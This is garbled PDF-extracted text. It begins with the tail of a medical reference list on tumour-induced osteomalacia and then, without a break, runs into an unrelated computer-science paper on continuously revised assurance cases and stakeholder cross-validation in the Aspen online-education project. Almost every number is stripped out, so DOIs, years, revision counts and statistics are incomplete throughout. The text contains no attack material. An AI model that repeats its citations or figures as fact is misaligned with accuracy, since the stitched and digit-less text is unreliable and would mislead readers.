endocrinology and metabolism – . (https://doi.org/ . /jc. - ) basu s & fargose p. lu-dotatate prrt in recurrent skull- base phosphaturic mesenchymal tumor causing osteomalacia: a potential application of prrt beyond neuroendocrine tumors. journal of nuclear medicine technology – . (https://doi. org/ . /jnmt. . ) kane sv, kakkar a, oza n, sridhar e & pai ps. phosphaturic mesenchymal tumor of the nasal cavity and paranasal sinuses: a clinical curiosity presenting a diagnostic challenge. auris, nasus, larynx – . (https://doi.org/ . /j. anl. . . ) feng j, jiang y, wang o, li m, xing x, huo l, li f, yu w, zhong dr, jin j, et al. 
the diagnostic dilemma of tumor induced osteomalacia: a retrospective analysis of cases. endocrine journal – . (https://doi.org/ . /endocrj.ej - ) khosravi a, cutler cm, kelly mh, chang r, royal re, sherry rm, wodajo fm, fedarko ns & collins mt. determination of the elimination half-life of fibroblast growth factor- . journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ) takeuchi y, suzuki h, ogura s, imai r, yamazaki y, yamashita t, miyamoto y, okazaki h, nakamura k, nakahara k, et al. venous sampling for fibroblast growth factor- confirms preoperative diagnosis of tumor-induced osteomalacia. journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ) minisola s, peacock m, fukumoto s, cipriani c, pepe j, tella sh & collins mt. tumour-induced osteomalacia. nature reviews disease primers . (https://doi.org/ . /nrdp. . ) reubi jc, waser b, schaer jc & laissue ja. somatostatin receptor sst –sst expression in normal and neoplastic human tissues using receptor autoradiography with subtype-selective ligands. european journal of nuclear medicine – . (https://doi. org/ . /s ) de beur smj, streeten ea, civelek ac, mccarthy ef, uribe l, marx sj, onobrakpeya o, raisz lg, watts nb, sharon m, et al. localisation of mesenchymal tumours by somatostatin receptor imaging. lancet – . (https://doi.org/ . /s - ( ) - ) kimizuka t, ozaki y & sumi y. usefulness of tl and m tc mibi scintigraphy in a case of oncogenic osteomalacia. annals of nuclear medicine – . (https://doi.org/ . /bf ) dupond jl, mahammedi h, prie d, collin f, gil h, blagosklonov o, ricbourg b, meaux-ruault n & kantelip b. oncogenic osteomalacia: diagnostic importance of fibroblast growth factor and f- fluorodeoxyglucose pet/ct scan for the diagnosis and follow-up in one case. bone – . (https://doi.org/ . /j. bone. . . ) breer s, brunkhorst t, beil ft, peldschus k, heiland m, klutmann s, barvencik f, zustin j, gratz kf & amling m. ga dotatate pet/ ct allows tumor localization in patients with tumor-induced osteomalacia but negative in-octreotide spect/ct. bone – . (https://doi.org/ . /j.bone. . . ) zhang j, zhu z, zhong d, dang y, xing h, du y, jing h, qiao z, xing x, zhuang h, et al. ga dotatate pet/ct is an accurate imaging modality in the detection of culprit tumors causing osteomalacia. clinical nuclear medicine – . (https:// doi.org/ . /rlu. ) seufert j, ebert k, müller j, eulert j, hendrich c, werner e, schütze n, schulz g, kenn w, richtmann h, et al. octreotide therapy for tumor- induced osteomalacia. new england journal of medicine – . (https://doi.org/ . /nejmoa ) ovejero d, el‐maouche d, brillante ba, khosravi a, gafni ri & collins mt. octreotide is ineffective in treating tumor‐induced osteomalacia: results of a short‐term therapy. journal of bone and this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /j.anorl. . . https://doi.org/ . /j.anorl. . . https://doi.org/ . /jscr/rjy https://doi.org/ . /rlu. https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /rlu. https://doi.org/ . /rlu. https://doi.org/ . /ajns.ajns_ _ https://doi.org/ . /ajns.ajns_ _ https://doi.org/ . /md. https://doi.org/ . /md. https://doi.org/ . /hed. https://doi.org/ . /s - - - https://doi.org/ . /bcr- - https://doi.org/ . /bcr- - https://doi.org/ . 
mineral research – . (https://doi.org/ . /jbmr. )
geller jl, khosravi a, kelly mh, riminucci m, adams js & collins mt. cinacalcet in the management of tumor-induced osteomalacia. journal of bone and mineral research – . (https://doi.org/ . /jbmr. )
cives m & strosberg j. radionuclide therapy for neuroendocrine tumors. current oncology reports . (https://doi.org/ . /s - - - )
weidner n. review and update: oncogenic osteomalacia-rickets. ultrastructural pathology – . (https://doi.org/ . / )
received in final form august. accepted september. accepted preprint published online september.

continuously revised assurance cases with stakeholders' cross-validation: a deos experience
kimio kuramitsu, graduate school of electronic and computer engineering, yokohama national university, japan
submitted january. accepted november. published december. corresponding author kimio kuramitsu, kimio@ynu.ac.jp. academic editor mariagrazia fugini. additional information and declarations can be found on page . doi . /peerj-cs. copyright kuramitsu. distributed under creative commons cc-by . open access.
abstract
recently, assurance cases have received much attention in the field of software-based computer systems and it services. however, software changes very often, and there are no strong regulations for software. these facts are two main challenges to be addressed in the development of software assurance cases.
we propose a method of developing assurance cases by means of continuous revision at every stage of the system life cycle, including in operation and service recovery in failure cases. instead of a regulator, dependability arguments are validated by multiple stakeholders competing with each other. this paper reported our experience with the proposed method in the case of aspen education service. the case study demonstrates that continuous revisions enable stakeholders to share dependability problems across software life cycle stages, which will lead to the long-term improvement of service dependability. subjects security and privacy, software engineering keywords assurance cases, gsn, deos process, experience report, service dependability introduction assurance cases are documentation-based engineering with structured arguments on safety and dependability. originally, assurance cases were developed in the field of safety engineering for public transportation and industrial plants, and they have been adopted broadly as a documentation standard (bloomfield & bishop, ). many regulators, especially in eu countries, are likely to validate assurance cases before the developed systems are deployed. recently, due to increased attention to safety and dependability in software, many developers have become interested in the application of assurance cases for software. however, software often changes over time and even needs to change after deployment. the emerging style of devops development suggests that it would be difficult to separate developments from service operations. this also makes it difficult for a regulator to assess assurance cases, thereby resulting in the absence of strong regulators for software in general. to overcome these difficulties, the deos process (tokoro, ) was developed with the life cycle maintenance of assurance cases. the idea is straightforward: assurance cases are revised in a synchronized way as software updates. an arising question is as follows: who validates such revised assurance cases, even in the post-development phase? the answer is still unclear in the deos process. in this paper, we assume that stakeholders how to cite this article kuramitsu ( ), continuously revised assurance cases with stakeholders’ cross-validation: a deos experience. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:kimio@ynu.ac.jp https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. who are competing with each other are motivated to validate cases because they will suffer directly from others’ faulty claims in assurance cases. however, many questions remain. can non-expert stakeholders learn about assurance cases and then join dependability arguments? is the validation strong enough? to confirm these questions, we organized a case study experiment, the aspen project, in which multiple stakeholders (e.g., developers, operators, and users) are involved in the software life cycle from development to service operation. throughout the life cycle, all stakeholders will have participated in arguing for or against the dependability using assurance cases written in goal-structuring notation (gsn) (kelly & weaver, ), a standard notation of assurance cases. 
unfortunately, service failures occurred during the experiment period, although all the stakeholders made extensive arguments in favor of gsn notations. the occurrence of service failure does not imply the weakness of stakeholders’ cross-validation, because system failure happened in a case of regulator validations. rather, the analysis of the failure case gives us a useful insight: the structured dependability arguments in gsns make it easier to find and share dependability problems across organizations. since transferring dependability problems is a missing part of software life cycle iteration, continuously revised assurance cases can be a new approach to the long-term dependability of ever-changing software. this paper focuses on the report of the aspen case study. the rest of the paper proceeds as follows: ‘what are assurance cases?’ introduces assurance cases and reviews-related work; ‘argumentation architecture’ presents our basic ideas for developing assurance cases for software; ‘experimental setup: aspen project’ describes the aspen project; ‘aspen cases’ examines the assurance cases that were developed in the aspen project; ‘lessons learned and discussions’ discusses lessons learned; and ‘conclusion’ concludes the paper. what are assurance cases? assurance cases are document-based engineering with structured arguments related to safety and dependability (avizienis et al., ). in this paper, we use the term dependability in a broader sense related to safety. the documents of assurance cases are structured to transfer the dependability confidence of products and services to others, such as regulators and third-party organizations. to make the confidence explicit, assurance cases are usually argued in the form of claim-argument-evidence (cae). figure illustrates the conceptual structure of assurance cases with the cae arguments. for example, consider the claim that a system is adequately dependable for operating in a given context. the argument explains the available evidence, showing how it reasonably supports the claim. the top-most claim is decomposed into a series of sub-claims until these can be solved with evidence. since the arguments make the rationale for the claim explicit, they are rigorous, justified, defensible, and transparent. due to the high transparency of dependability arguments, assurance cases generally serve as an efficient risk-communication tool between organizations. however, the most practically used scenario is transferring the developer’s confidence to a regulator or a kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. claim evidence claim of some properties arguments evidence supporting their claims claim claim claim claim evidence evidence figure argument structure of assurance cases. third-party company to assess the conformance of dependability regulations (graydon et al., ). through this assessment mechanism, the regulator forces the developer’s product to meet its regulations, and then the user trusts the developer’s product due to the regulator’s authority. in contrast, the self-assessment of conformance or the absence of dependability regulations makes assurance cases self-righteous and less confident. related work our work builds on many excellent existing ideas for the development of assurance cases in software, including life cycle developments (graydon, knight & strunk, ), argument patterns (weaver, mcdermid & kelly, ; hawkins et al., ), and reviewing arguments (kelly, ; yuan & kelly, ). 
in particular, graydon, knight & strunk ( ) proposed a closed approach to integrating assurance into the development process by co-developing the software system and its assurance case. hawkins et al. extensively studied the assurance aspect of the software process (hawkins et al., ) and software evolution (hawkins et al., ). a clear, new idea presented in this paper is the use of accountability (by dependability arguments with stakeholder identity), which allows multiple competing stakeholders to share dependability problems across the life cycle stages. in general, assurance information needs to be kept confidential in safety-critical systems (bloomfield, ). however, many experimental research reports have been published for researchers as in an unmanned aircraft (denney, habli & pai, ), automobiles (iso ) (ruiz, melzi & kelly, ), autonomous vehicle and aircraft safety critical software (hawkins et al., ), generic infusion pumps (kim et al., ), pacemakers (jee, lee & sokolsky, ), and health it services (despotou et al., ). in these reported areas, there exists strong regulators who validate the safety of products and services, and the development of reported assurance cases is initially motivated for their regulators. in comparison, our experience report is unique in terms of neither regulators nor safety standards. how assurance cases to be developed for improved software without regulators is an interesting open question for software practitioners (tokoro, ). kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. argumentation architecture this section describes our ideas on how to use assurance cases in software-based it systems with no strong regulator. sharing dependability arguments our initial motivation comes from the risk of miscommunication between stakeholders, such as developers and operators, who separately act in distinct phases of the life cycle. in other words, limitations discussed during software development are quite useful for operators attempting to deliver the correct services, but they are unseen at the time of operation. on the contrary, discussions at the time of operation can provide useful feedback for further development. sharing such discussions, which are focused on dependability, is demanded extensively to improve the long-term dependability of the products and services. our aim in the use of assurance cases is to share dependability arguments among stakeholders throughout the life cycle. as introduced in ‘what are assurance cases?’, the arguments are well structured and more likely to inspire confidence in stakeholders due to the supporting evidence. this would suggest that assurance cases serve as a good foundation for sharing focused knowledge and risk communications. the argumentation architecture needs to change slightly when we attempt to apply it between (a) one stakeholder and another and (b) many stakeholders to many others. first, the top claim must represent a common goal and assumptions that are shared among all stakeholders. we decompose the common claim into sub-claims so that each stakeholder can separately lead his or her active part of the dependability arguments. the top claim is decomposed by stages in the life cycle of products and services. then, we decompose each stage claim by stakeholders if multiple acting stakeholders exist in the same stage. each stakeholder has to provide available evidence that supports dependability claims that are part of the common goal. 
staging in the lifecycle varies from project to project, but we refer to the following stages in this paper. • planning stage (requirement elicitation and architecting) • development stage (coding and testing) • operation stage (service design and failure recovery) • evolution stage (change accommodation). note that the abovementioned stage decomposition is based on the open system dependability (tokoro, ) that we proposed in the jst/deos project. it is distinct in its evolution stage, when all stakeholders argue for the continuous improvement of services beyond the lifetime of a single system operation. accountability, rebuttals, and revision currently, most software-based it services run under no regulation. as described in ‘what are assurance cases?’, the absence of strong regulators may reduce the practicality of assurance cases. this is a challenge to be avoided in practice. kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. claim evidence developer a claim claim operator c claim developer a claim developer b evidence developer b evidence operator c rebuttal operator c in development in operation agreement figure cross-validation and agreements on conflicts. the first idea to confront this problem is the use of the concept of accountability (haeberlen, kouznetsov & druschel, ); accountability is widely used to build trust and reputation among competing individuals and organizations by exposing failures. in the context of assurance cases, we can integrate the concept of accountability by recording the stakeholder’s identity in every element of assurance cases. that is, the stakeholder’s identity can be used to trace who makes a faulty claim or who gives faulty evidence when a problem occurs. in general, this results in strong incentives to avoid faulty claims and evidence. in addition to stakeholder accountability, we include a form of rebuttal in the dependability arguments. in the context of assurance cases, a rebuttal is a challenge to a claim or an objection to the evidence, usually noted in the review process. rebuttals do not remain during the assessment process because they need to be solved prior to certification. in the case of the absence of a regulator, a rebuttal is not strong enough to enforce modification. unsolved rebuttals are considered conflicts. if the conflicts remain between stakeholders, the claim containing the rebuttal also is regarded in terms of the stakeholder agreements. note that the rebuttals are recorded with the stakeholder’s identity for accountability. based on the recorded rebuttals, we use cross-validation between stakeholders instead of third-party reviewers, since stakeholders in part compete with each other (e.g., a developer wants reduced costs for development, but this makes improperly developed systems a potential risk). a faulty claim often becomes a potential risk for other stakeholders. naturally, non-rebuttal claims are regarded as approved by all stakeholders with some sharable responsibility when a problem occurs. this also leads to other incentives to make rebuttals to others’ claims. figure illustrates our proposed argumentation architecture with life cycle decomposition and stakeholder identities. more importantly, recall that our aim is to facilitate sharing dependability problems between stakeholders, not to facilitate competition among them. the developers and the operators can change software or service operations if they agree on the given rebuttals. 
in addition, they are also allowed to revise the related assurance cases if their practice is changed. this results in an iterative process that enables us to better capture the ever-changing nature of software and maintain the dependability of changing software. note that we assume that all revised versions of assurance cases can be maintained by a proper version control system. assurenote, which is used in this experiment, has been developed for this purpose.

figure : overview of the aspen system.

experimental setup: aspen project
the aspen project is our organized experiment as a part of the jst/deos project (tokoro, ) to investigate the life cycle maintenance of assurance cases without any regulators. the aspen project includes not only the development of assurance cases across different organizations but also aspen's software development and service operation with deos industrial partners. this section describes the experimental design in the aspen project.

system and service overview
aspen is an online education system that provides exercises on programming to students via the web. figure provides the overview of the aspen service. the aspen system is not unusual: it consists of multiple servers, including apache web servers, mysql servers, and zabbix monitor servers, which run on linux operating systems. all of the software that constitutes the aspen system is written in scripting languages such as python and javascript. due to the agile nature of these languages, the aspen system is updated often, even after its deployment. aspen is a typical web-based system, not the kind of safety-critical system on which assurance cases have mainly been developed so far. however, aspen involves several dependability attributes (avizienis et al., ) that are commonly required in software-based it services:
• availability: the service will always be available to the users (i.e., students).
• reliability: no hardware or software failures occur during provision of the service.
• integrity: programming assignments supplied by the owner do not disappear.
• privacy: personal information is not disclosed to unauthorized parties.

documentation and tool supports
in the aspen project, we use goal structuring notation (gsn) (kelly & weaver, ) to share assurance cases among stakeholders. gsn is a standard argumentation notation for assurance cases in safety-critical industries. gsn consists of four principal elements, goal (depicted as a rectangle), strategy (parallelogram), evidence (oval), and context (rounded rectangle), as shown in fig. .

figure : gsn elements.

the goal element is used to state a claim that a system certainly has some desirable properties, such as safety and dependability. the evidence element is some piece of material to support that the linked claim is true. a goal without linked evidence is called undeveloped. as in the cae notation, a goal is decomposed into sub-goals until a point is reached where claims can be supported by direct reference to available evidence. the strategy element is used to state a reason for claim decomposition. the context element is used to state an assumption (the system scope and the assumed properties). there is no special support for stating a rebuttal.
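a minimal encoding of the four gsn element kinds described above, with the author of each element recorded in the spirit of the accountability idea from 'argumentation architecture', might look as follows. this is an illustrative sketch only; it does not reflect assurenote's actual data model or api.

```python
from dataclasses import dataclass
from enum import Enum
from typing import List, Optional

class Kind(Enum):
    GOAL = "goal"          # rectangle: a claim about the system
    STRATEGY = "strategy"  # parallelogram: reason for decomposing a goal
    EVIDENCE = "evidence"  # oval: material supporting a goal
    CONTEXT = "context"    # rounded rectangle: assumption or scope

@dataclass
class GsnElement:
    kind: Kind
    text: str
    author: str                          # stakeholder identity, recorded for accountability
    parent: Optional["GsnElement"] = None

def is_undeveloped(goal: GsnElement, elements: List[GsnElement]) -> bool:
    """A goal with neither sub-goals nor linked evidence is 'undeveloped'."""
    children = [e for e in elements if e.parent is goal]
    return goal.kind is Kind.GOAL and not any(
        c.kind in (Kind.GOAL, Kind.EVIDENCE) for c in children)

# toy usage (authors and texts are illustrative)
g1 = GsnElement(Kind.GOAL, "submitted programs are never lost", "developer")
e1 = GsnElement(Kind.EVIDENCE, "the programs are stored in git", "developer", parent=g1)
print(is_undeveloped(g1, [g1, e1]))  # False: the goal has linked evidence
```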
we regard the context element linked to the evidence as the rebuttal element. in the experiment, we used assurenote (shida et al., ), a web-based authoring tool that allows multiple users to share a gsn document via the web. figure is a screenshot of assurenote. in assurenote, all gsn elements are automatically recorded with the user identity under the version control of gsn elements. kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure assurenote: a web-based gsn authoring tool. stakeholders another main aim of the aspen project is to examine the effect of assurance cases in the absence of a strong regulator. as described in ‘argumentation architecture’, we need to set up some competing relationship between stakeholders. all stakeholders were selected from different institutes. first, we contracted two different firms separately: one that took charge in software development and the other in service operation. second, we asked an instructor who had adopted the aspen system in her classroom to join the experiment as a stakeholder. the author plays a coordinator role, not a regulator role throughout the whole stage. the stakeholders involved in the aspen project are listed below. • owner: the author • developer: a programmer working for a software development firm • operator: a system engineer with more than years’ experience with web-based service operations • user: an instructor who use the aspen in her classroom. in this paper, we identify stakeholders by role names–owner, developer, operator, and user–for readability. however, on the assurance cases, stakeholders are identified by a personal name for the sake of accountability. kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. development procedure in the experiment, we attempt to develop assurance cases in parallel with the development and service operation of the aspen system. all assurance cases and other communications between stakeholders are written and spoken in japanese. in the planning stage, the owner defines the top claim, which includes dependability goals and assumptions, for which the aspen system is assumed to deliver correct services for the users. following the planning stage, we undertake the aspen system with the following procedures: • the developer claims that the developed system meets the owner’s dependability goals with supporting evidence. • the operator, the user, and the owner review the developer’s claims and agree or disagree. • the operator, based on the developed system, claims that the system operation meets the owner’s dependability goals with supporting evidence. • the developer, the user, and the owner review the operator’s claims and come to agreements on the conflicted claims. • any stakeholder can revise the assurance cases if they contain any insufficiencies or flaws. as shown above, we focus on dependability-related issues and avoid general issues with software implementations and operating procedures. when we handle the disagreement, we ask all stakeholders to meet together at the same place to agree on the conflicts. aspen cases the aspen cases were developed with the method that we proposed in the ‘argumentation architecture’ and ‘experimental setup: aspen project’ sections. this section reports how the arguments are organized with a fragment of gsns and excerpted from the developed assurance cases. overview first, we overview the statistics of the aspen cases. 
as we described in 'stakeholders', the aspen cases are written in gsn. we first gave the top goal, which was decomposed into the development stage, the service stage, and the evolution stage with common assumptions. the gsns were revised times throughout the aspen project. here we use #n to represent the nth revision. the gsn document grew from four elements (at # ) to elements (at # ). we identify the major revisions as follows:
• # initial requirement
• # development
• # development agreement
• # service design
• # service agreement
• # failure recovery
• # service evolution.

figure : growth of assurance cases in gsn elements (number of goals, contexts, evidence, and rebuttals at each major revision, from planning through system evolution).

figure shows the growth of the aspen cases in the number of gsn elements: goals, contexts, evidence, and rebuttals. the increase in contexts suggests that the goals became less ambiguous, and the increase in evidence suggests that the uncertainty in the dependability claims was reduced. in the remainder of this section we take a closer look at the development agreement (# –# ), the service agreement (# –# ), the failure recovery (# ), and the system evolution (# ).

development agreement
the developer started the argument with the claim "aspen is dependable" and decomposed it into sub-claims by dependability attributes (cf. aspen is available, integral, safe, etc.). the forms of evidence that the developer provided were mostly other external experience reports (collected from the internet). some goals included a lack of evidence. note that a lack of evidence does not directly imply a lack of dependability, but it does indicate uncertainty about dependability. figure illustrates the fragment with the developer's claim that the software is integral in data storage. one could consider that evidence e . was not reasonable evidence to support claim g . likewise, the operator pointed out a risk of hardware failure in the disk storage. however, there was not enough time to change the storage system.

figure : example of a rebuttal by the operator's review (the developer's goals state that data, submitted programs, and student activities are never lost; the supporting evidence is that the programs are stored in git; the operator's rebuttal, recorded as a context, notes the lack of data backups).

instead, the operator agreed to fault tolerance at the time of operation. in the end, the operator made nine rebuttals to the developer's claims prior to the operations.

service agreement
in the operation stage, we focus only on fault mitigation and failure recovery. the operator led the arguments of this part using the fault-avoidance pattern, which consists of the following two parts:
• the symptom of a failure (an error) is detectable (by monitoring).
• the detected symptom is mitigated before the service stops.
the completeness of fault-avoidance analysis is important but not pursued in the experiment, in part because we want to evaluate the iterative updates of assurance cases during the operations. figure is a fragment of assurance cases arguing about the server's availability.
note that some embedded parameters are used for operation scripts (kuramitsu, ). one could consider the given evidence questionable, but the user and the owner trusted the operator's claims without any doubt due to their limited knowledge. they did not make any rebuttals against the operator, except for some concerning help-desk support in case of service failures.

figure : example of arguments on failure avoidance in operation (s. : arguing over types of errors; goals state that symptoms of a failure, such as network overload and cpu overload, are detectable; the evidence is that the zabbix monitor is installed; context elements record the assumed number of simultaneous users and the load-average threshold that is defined as an error).

failure recovery
we encountered several service failures while running the aspen system. since unexpected failures imply faulty arguments, the operator or the developer needs to revise the assurance cases. here, we highlight a service failure that occurred in the middle of a classroom session. this failure appeared only when students used aspen in the classroom. the system monitor indicated that the server's operating system was unexpectedly down. at first, the operator suspected that there were unknown bugs in the aspen system, and the developer did find some bugs that seemed related to the service failure. had there been no assurance cases, they would have used an incorrect method to recover from the service failure. in reviewing the assurance cases, the claim "the servers can scale out" turned out to be overconfident: the operator had never tested the server under any network traffic settings. however, no one had pointed out that this claim seemed faulty. after the server problem occurred, the operator recognized that the scale-out setting was incapable of handling simultaneous access by students in the classroom. the instructor strongly requested that the operator increase the servers as the operator had claimed in the assurance cases.

another serious dependability problem was found later in the context of the top goal, which described common assumptions about the aspen system. originally, the aspen system was assumed to allow students to submit their assignments from home computers. based on this assumption, the maximum simultaneous access was estimated to be at most five connections. the number of students in the classroom was fewer than students, but the density of access traffic differed from the estimated patterns. in other words, the top-goal assumption was a sort of bug, which resulted in rechecking all given evidence.

system evolution
the aspen project ran for two years. in the second year, the aspen system evolved with the following major updates:
• the adoption of moodle, an open-source solution, to reduce in-house development
• a system movement to amazon web services (a standard cloud computing platform).
these system updates were not random but derived from several dependability goals and potential risks that were argued in the revised assurance cases. more importantly, all stakeholders, including those who were newly involved in the aspen project, could share the justification of these system updates in terms of dependability improvements.
compared to unstructured e-mail communications, the gsn-formed arguments made it easier to trace dependability problems that actually happened or were expected in the first year. lessons learned and discussions this section describes lessons we learned throughout the aspen case in the form of answering research questions. (question ). do non-experts join dependability arguments with gsns? yes. for all of the participants, the concept of assurance cases was totally new, and they were suspicious of the assurance cases’ benefits. we gave them about a -hour technical lecture on the notation of gsn (not the concept of assurance cases itself.) this short lecture and a web-based gsn viewer were all we prepared for participants to read gsns for dependability arguments. note that organizing dependability arguments is a known difficulty according to bloomfield & bishop ( ). we prepared several simple argument patterns, which are described in ‘experimental setup: aspen project’. due to the argument patterns, arguments grew in a well-structured way. (question ). what was the hardest part in the development of continuously revised assurance cases? collecting acceptable evidence for their dependability claims was difficult and costly. in part because the assurance cases were new for both the developers and the operators, they did not prepare any forms of evidence in their process. for example, the developers performed many software tests as usual, but these test results were far from those requested in the non-functional arguments. neither the developers nor the operators wanted to spend extra resources for evidence, while competing stakeholders always requested much more evidence. perhaps dependability guidelines are necessary to reach agreement on proper forms and levels of evidence. (question ). did stakeholders really validate others’ claims? yes, they were willing to review and tried to validate them. rebuttal serves an enforced communication vehicle between stakeholders. one reason for their many responses was that kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we introduced some penalty (e.g., sharing responsibilities in failure cases) for no-rebuttal claims. this penalty seemed unrealistic but forced all stakeholders to find faulty claims. the activity of cross-validation can be measured by the number of revisions and the growth of gsn elements: • revisions for the development claims • two revisions for the operation claims. the development claims were revised more often than the operation claims. the difference comes mainly from the stakeholders’ expertise. the users were likely to trust the operator’s claims and evidence. (lesson ). is the stakeholder cross-validation strong enough? the answer is that the strength depends on stakeholders’ expertise. the dependability arguments between developers and operators seemingly worked. system failures that occurred in the aspen system were caused by bad operations, not a flaw in the developed software. on the other hand, the users lacked the knowledge of service operations, and they could not point out any weaknesses in the operators’ claims documented in the assurance cases. however, the faulty claims were costly in cases of system failures because the users strongly requested the fulfillment of the operator’s claims as documented. we expected that the gsn documentation became a strong incentive for operators to avoid faulty claims. 
in reality, the costs of collecting evidence overwhelmed such incentives. (question ). is the development of assurance cases useful in software? the answer is positively yes. our finding in the case analysis of failure recovery suggests that the developed assurance cases make it easier to find dependability problems throughout structured arguments in gsns. even if we are not able to avoid the service failure the first time, the dependability problems can be transferred clearly in the redevelopment phase. since transferring dependability problems across the organization is a missing part in dependability engineering, the contentiously revised assurance cases can bridge the missing part. conclusion recently, assurance cases have received much attention in the field of software-based computer systems and it services. however, software often changes, and there are no strong regulations for software. these facts make the use of software assurance cases more difficult. we proposed a development method for assurance cases with stakeholder cross-validation at every stage of the system life cycle, including in operation and service recovery in a case of system failure. this paper reported our practitioner experience based on the aspen project. as we expected, stakeholders competing with each other were well motivated to find the faulty claims of the others in the gsn documents. this improves the quality of dependability arguments. unfortunately, the stakeholder cross-validation was not able to avoid simple system failures in advance. the case analysis of failure recovery with assurance cases suggests that dependability problems can be easily transferred in a structured way across kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. stakeholders and organizations. since transferring dependability problems is an important missing part of long-term dependability, continuously revised assurance cases may serve as a potential new approach to the long-term improvement of service dependability. in future work, we will investigate the dependability effect of assurance cases from a longer-term perspective. acknowledgements the authors thank to all the deos research members, especially mario tokoro, shuichiro yamamoto, yutaka matsuno, midori sugaya, yoshiki kinoshita, makoto takeyama, and makoto yashiro. additional information and declarations funding this work was supported by the jst/crest grant ‘‘dependable embedded operating systems for practical uses.’’ the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: jst/crest. competing interests the author declares there are no competing interests. author contributions • kimio kuramitsu conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper, funding. data availability the following information was supplied regarding data availability: the raw data has been supplied as a supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references avizienis a, laprie j-c, randell b, landwehr ce. . basic concepts and taxonomy of dependable and secure computing. 
ieee transactions on dependable and secure computing ( ): – doi . /tdsc. . . kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /tdsc. . http://dx.doi.org/ . /peerj-cs. bloomfield r. . open assurance. security privacy, ieee ( ): – doi . /msp. . . bloomfield re, bishop pg. . safety and assurance cases: past, present and possible future—an adelard perspective. in: making systems safer—proceedings of the eigh- teenth safety-critical systems symposium, bristol, uk, february – , . – doi . / - - - - - . denney e, habli i, pai g. . perspectives on software safety case development for unmanned aircraft. in: proceedings of the nd annual ieee/ifip international conference on dependable systems and networks (dsn ). piscataway: ieee. despotou g, white s, kelly t, ryan m. . introducing safety cases for health it. in: proceedings of the th international workshop on software engineering in health care. piscataway: ieee, – . graydon p, habli i, hawkins r, kelly t, knight j. . arguing conformance. ieee software ( ): – doi . /ms. . . graydon pj, knight jc, strunk e. . assurance based development of critical systems. in: dependable systems and networks, . dsn’ . th annual ieee/ifip international conference on. piscataway: ieee, – . haeberlen a, kouznetsov p, druschel p. . peerreview: practical accountabil- ity for distributed systems. in: proceedings of twenty-first acm sigops sym- posium on operating systems principles, sosp ’ . new york: acm, – doi . / . - - - - . hawkins r, clegg k, alexander r, kelly t. . using a software safety argument pattern catalogue: two case studies. in: proceedings of the th international conference on computer safety, reliability, and security, safecomp’ . berlin: springer-verlag, – . hawkins r, habli i, kelly t, mcdermid j. . assurance cases and prescrip- tive software safety certification: a comparative study. safety science : – doi . /j.ssci. . . . hawkins r, miyazawa a, cavalcanti a, kelly t, rowlands j. . assurance cases for block-configurable software. in: proceedings of the rd international conference on computer safety, reliability, and security—volume , safecomp . new york: springer-verlag new york, inc., – doi . / - - - - - - - - - . jee e, lee i, sokolsky o. . assurance cases in model-driven development of the pacemaker software. in: leveraging applications of formal methods, verification, and validation— th international symposium on leveraging applications, isola , heraklion, crete, greece, october – , , proceedings, part ii. lecture notes in computer science, vol. . berlin heidelberg: springer, – . kelly t. . reviewing assurance arguments-a step-by-step approach. in: workshop on assurance cases for security-the metrics challenge, dependable systems and networks (dsn). available at https://www-users.cs.york.ac.uk/tpk/dsnworkshop .pdf . kuramitsu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /msp. . http://dx.doi.org/ . / - - - - - http://dx.doi.org/ . /ms. . http://dx.doi.org/ . / . - - - - http://dx.doi.org/ . /j.ssci. . . http://dx.doi.org/ . / - - - - - - - - - https://www-users.cs.york.ac.uk/tpk/dsnworkshop .pdf http://dx.doi.org/ . /peerj-cs. kelly t, weaver r. . the goal structuring notation—a safety argument notation. 
